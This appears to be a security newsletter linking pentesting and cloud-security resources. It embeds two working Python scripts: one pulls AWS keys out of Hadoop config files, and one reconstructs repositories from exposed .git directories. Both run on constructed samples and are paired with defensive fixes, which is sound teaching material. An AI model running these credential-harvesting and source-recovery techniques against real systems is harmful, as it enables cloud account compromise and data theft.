Artifactory Hacking Guide
Nice overview by Guillaume Quéré: default users and passwords, checking account permissions and listing users, high severity known vulnerabilities, post exploitation, and how to defend it.
New project by Daniel García that aims to make it easy to integrate HTTP API tools into execution chains: the output and input of each tool is JSON, so you can pipe them together like *NIX tools. This is reminiscent of Daniel Miessler's approach in his Red Team Village talk, Mechanizing the Methodology.
Java RMI for pentesters: structure, recon and communication (non-JMX Registries)
Łukasz Mikuła describes what RMI (Remote Method Invocation) interfaces are (tl;dr: they expose Java RPC calls over the network), how to build one from source, what you can learn about an RMI interface from an Nmap scan, how to build an RMI client, and which issues and stack traces you typically encounter when dealing with RMIs and what they mean.
An opinionated guide on how to conduct a web application security assessment by NCC Group’s Tanner Prynn covering a range of topics including application mapping, reviewing the design, authentication and authorization, frontend attacks, input handling, & cryptography.
@Mastering Burp Suite Pro
Twitter account full of Burp tips by Nicolas Grégoire, creator of a popular Burp Suite training course.
AWS IAM explained for Red and Blue teams
Nice overview by Federico Lago.
A tool to detect a set of common Google Kubernetes Engine misconfigurations.
Exploiting fine-grained AWS IAM permissions for total cloud compromise: a real world example (part 1/2)
Nice write-up by Federico Lago describing a testing flow: Hadoop instance with an exposed unauthenticated ResourceManager service -> RCE with Metasploit -> AWS access keys in core-site.xml -> enumerate permissions with enumerate-iam -> check for privilege escalation with aws_escalate.py -> enumerate S3 buckets you can read -> more AWS creds, and more.
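The "AWS access keys in core-site.xml" step above is worth seeing concretely, because Hadoop's S3 connectors read credentials from a handful of well-known property names. The following is an added example (not code from Federico Lago's write-up): it parses a constructed core-site.xml, pulls out the properties the s3a/s3n/s3 connectors use for static credentials, classifies the access key ID by prefix (AKIA = long-lived IAM user key, ASIA = temporary STS credential, which matters for how long the foothold lasts), and flags whether the file instead uses Hadoop's credential provider, which is the defensive alternative to plaintext keys. The sample values are the AWS documentation placeholders, not real credentials.

```python
"""Extract and classify AWS credentials found in a Hadoop core-site.xml.

Added example for a post-exploitation triage step; the sample XML below is
constructed and uses AWS's documented placeholder key values.
"""
import re
import xml.etree.ElementTree as ET

# Property names the Hadoop S3 connectors (s3a, legacy s3n/s3) read
# static credentials from, mapped to a normalised field name.
AWS_KEY_PROPS = {
    "fs.s3a.access.key": "access_key",
    "fs.s3a.secret.key": "secret_key",
    "fs.s3a.session.token": "session_token",
    "fs.s3n.awsAccessKeyId": "access_key",
    "fs.s3n.awsSecretAccessKey": "secret_key",
    "fs.s3.awsAccessKeyId": "access_key",
    "fs.s3.awsSecretAccessKey": "secret_key",
}

# When set, Hadoop pulls secrets from a JCEKS keystore instead of plaintext.
CREDENTIAL_PROVIDER_PROP = "hadoop.security.credential.provider.path"

# AWS access key IDs: 4-char prefix + 16 upper-case alphanumerics.
ACCESS_KEY_RE = re.compile(r"^(AKIA|ASIA)[A-Z0-9]{16}$")

# Constructed sample; placeholder values taken from AWS documentation.
SAMPLE_CORE_SITE = """<?xml version="1.0"?>
<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://namenode:8020</value></property>
  <property><name>fs.s3a.access.key</name><value>AKIAIOSFODNN7EXAMPLE</value></property>
  <property>
    <name>fs.s3a.secret.key</name>
    <value>wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY</value>
  </property>
  <property><name>fs.s3a.endpoint</name><value>s3.eu-west-1.amazonaws.com</value></property>
</configuration>
"""

# Constructed sample of the hardened form: no key material in the file.
SAMPLE_CORE_SITE_HARDENED = """<?xml version="1.0"?>
<configuration>
  <property>
    <name>hadoop.security.credential.provider.path</name>
    <value>jceks://hdfs@namenode:8020/user/hadoop/aws.jceks</value>
  </property>
</configuration>
"""


def _properties(xml_text):
    """Yield (name, value) pairs from a Hadoop-style configuration file."""
    root = ET.fromstring(xml_text)
    for prop in root.iter("property"):
        name = (prop.findtext("name") or "").strip()
        value = (prop.findtext("value") or "").strip()
        if name:
            yield name, value


def extract_aws_credentials(xml_text):
    """Return {'access_key': ..., 'secret_key': ..., 'session_token': ...}
    for whatever static credential properties are present."""
    creds = {}
    for name, value in _properties(xml_text):
        if name in AWS_KEY_PROPS and value:
            creds[AWS_KEY_PROPS[name]] = value
    return creds


def uses_credential_provider(xml_text):
    """True if the file delegates secrets to a Hadoop credential provider."""
    return any(name == CREDENTIAL_PROVIDER_PROP and value
               for name, value in _properties(xml_text))


def classify_access_key(access_key):
    """'long-lived' for IAM user keys (AKIA), 'temporary' for STS (ASIA)."""
    if not ACCESS_KEY_RE.match(access_key):
        return "unknown"
    return "long-lived" if access_key.startswith("AKIA") else "temporary"


def triage(xml_text):
    """One-shot summary an operator (or a secrets scanner) would want."""
    creds = extract_aws_credentials(xml_text)
    return {
        "credentials": creds,
        "key_type": classify_access_key(creds.get("access_key", "")),
        "uses_credential_provider": uses_credential_provider(xml_text),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_CORE_SITE))
    print(triage(SAMPLE_CORE_SITE_HARDENED))
```

On the defensive side, the same parser doubles as a check in a config-review pipeline: any hit in `AWS_KEY_PROPS` with `uses_credential_provider` false is a plaintext secret on disk that an RCE on the cluster turns into cloud access, and an AKIA key is the worse case because it does not expire on its own.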
Amazon Detective introduces IAM Role Session Analysis
“Amazon Detective now analyzes IAM role sessions so that you can visualize and understand the actions that users and apps have performed using assumed roles. Detective enables you to answer questions such as “which federated user invoked APIs that are associated with a security finding?”, “what API calls did a user invoke across a chain of role assumptions?”, “What API activity did an EC2 instance perform?” and “which of my users use this cross-account role?”, all without manually analyzing CloudTrail logs.”
Introducing mutual TLS authentication for Amazon API Gateway
“AWS is introducing certificate-based mTLS authentication for Amazon API Gateway. This is a new method for client-to-server authentication that can be used with API Gateway’s existing authorization options.”
EkoParty Advanced Fuzzing Workshop
Exercises and slides by Antonio Morales.
Beware of the Shadowbunny - Using virtual machines to persist and evade detections
Johann Rehberger describes an attacker tactic of deploying a VM on a target host to pivot, provide persistence, and at the same time evade detection.
Terraform modules to automatically exploit certain AWS scenarios, like copying a publicly exposed EBS snapshot, spinning up a Lambda to exfiltrate an AWS temporary credential, and more.
Politics / Privacy
Blacklight by The Markup
Blacklight is a service that visits a provided URL with a headless browser and reports the ad trackers and third-party cookies it finds, whether a session recording service is present, whether the page captures keystrokes, and whether Facebook or Google analytics trackers are on it.
The data dump that reveals the astonishing breadth of Beijing’s interference operations
China is systematically gathering information on politically or otherwise important people around the world so that they can influence them. Not surprising, but concerning. See relevant snippets on the blog.
The Dumpster Fire that is U.S. Politics
It seems almost impossible to even keep track of current events, but here are a few things that happened recently: the NY Times obtained two decades of the President's tax returns and deep dived into what they found, the 2016 Trump campaign paid for Facebook ads to discourage 3.5 million black Americans in battleground states from voting, the first debate was a $*@#-show. More details on the blog.
By Liam Galvin: Downloads git repositories and extracts their contents from sites where the .git directory has been mistakenly uploaded. It can still recover a significant portion of a repo even where directory listings are disabled.
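Why recovery works without directory listings is worth spelling out: every git object names the objects it points to by hash, so once HEAD is readable you can walk HEAD -> ref -> commit -> tree -> blobs, requesting each loose object by its predictable path `objects/ab/cdef...` and never needing an index of the directory. The following is an added example (not Liam Galvin's tool): it builds a tiny repository's loose objects in memory to stand in for a web server that serves `/.git/` but returns 404 for directory listings, then recovers the working tree by following hashes. `fetch()` is a stand-in for an HTTP GET of `https://target/.git/<path>`; the file contents are constructed.

```python
"""Recover a repository's files from an exposed .git/ by following hashes.

Added example. The "remote" is an in-memory dict of path -> bytes that mimics
a web server exposing .git/ with directory listings disabled; fetch() stands
in for an HTTP GET of /.git/<path>. The repository contents are constructed.
"""
import hashlib
import zlib


def make_object(obj_type, content):
    """Return (sha1 hex, zlib-compressed bytes) as git stores a loose object."""
    raw = f"{obj_type} {len(content)}\0".encode() + content
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def build_fake_remote():
    """Constructed .git/ with one commit: README.md and a leaked .env file."""
    files = {}
    env_sha, env_obj = make_object("blob", b"AWS_SECRET=example-not-real\n")
    readme_sha, readme_obj = make_object("blob", b"# demo\n")
    # Tree entries are "<mode> <name>\0<20 raw sha bytes>", sorted by name.
    entries = sorted([("100644", ".env", env_sha),
                      ("100644", "README.md", readme_sha)], key=lambda e: e[1])
    tree_content = b"".join(f"{m} {n}\0".encode() + bytes.fromhex(s)
                            for m, n, s in entries)
    tree_sha, tree_obj = make_object("tree", tree_content)
    commit_content = (f"tree {tree_sha}\n"
                      "author A <a@example.com> 0 +0000\n"
                      "committer A <a@example.com> 0 +0000\n\ninitial\n").encode()
    commit_sha, commit_obj = make_object("commit", commit_content)
    for sha, obj in [(env_sha, env_obj), (readme_sha, readme_obj),
                     (tree_sha, tree_obj), (commit_sha, commit_obj)]:
        files[f"objects/{sha[:2]}/{sha[2:]}"] = obj
    files["HEAD"] = b"ref: refs/heads/main\n"
    files["refs/heads/main"] = (commit_sha + "\n").encode()
    return files


def fetch(remote, path):
    """Stand-in for GET https://target/.git/<path>; None means 404."""
    return remote.get(path)


def read_object(remote, sha):
    """Fetch a loose object by hash and split it into (type, content)."""
    data = fetch(remote, f"objects/{sha[:2]}/{sha[2:]}")
    if data is None:
        return None, None  # packed-only object; would need a packfile
    header, _, content = zlib.decompress(data).partition(b"\0")
    obj_type, _size = header.decode().split(" ")
    return obj_type, content


def parse_tree(content):
    """Decode tree entries into (mode, name, sha hex) tuples."""
    entries, i = [], 0
    while i < len(content):
        nul = content.index(b"\0", i)
        mode, name = content[i:nul].decode().split(" ", 1)
        entries.append((mode, name, content[nul + 1:nul + 21].hex()))
        i = nul + 21
    return entries


def resolve_head(remote):
    """HEAD -> commit sha, falling back to packed-refs for a packed ref."""
    head = fetch(remote, "HEAD").decode().strip()
    if not head.startswith("ref: "):
        return head  # detached HEAD holds the sha directly
    ref = head[len("ref: "):]
    data = fetch(remote, ref)
    if data is not None:
        return data.decode().strip()
    for line in (fetch(remote, "packed-refs") or b"").decode().splitlines():
        if line and not line.startswith(("#", "^")) and line.endswith(" " + ref):
            return line.split(" ", 1)[0]
    raise LookupError(f"cannot resolve {ref}")


def recover_tree(remote):
    """Return {path: blob bytes} reachable from HEAD, with no listing."""
    _, commit = read_object(remote, resolve_head(remote))
    tree_sha = commit.decode().split("\n", 1)[0].split(" ", 1)[1]
    recovered = {}

    def walk(sha, prefix):
        _, content = read_object(remote, sha)
        for mode, name, entry_sha in parse_tree(content):
            if mode == "40000":  # subdirectory
                walk(entry_sha, f"{prefix}{name}/")
            else:
                obj_type, blob = read_object(remote, entry_sha)
                if obj_type == "blob":
                    recovered[f"{prefix}{name}"] = blob

    walk(tree_sha, "")
    return recovered


if __name__ == "__main__":
    for path, blob in recover_tree(build_fake_remote()).items():
        print(path, blob)
```

The fallback in `read_object` is the one real-world limit: objects that live only in a packfile are not addressable by path, which is why such tools recover "a significant portion" rather than everything. The fix on the server side is to deny the path outright (for example an nginx `location ~ /\.git { deny all; }`) rather than merely disabling autoindex.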
A list of subdomains for publicly listed programs.
A framework for effective corporate communication after cyber security incidents
Paper by academics that lays out a framework for how organizations should communicate after a security incident. The paper has some great overview figures, so I pulled them out into a quick summary blog post.
Thanks for reading!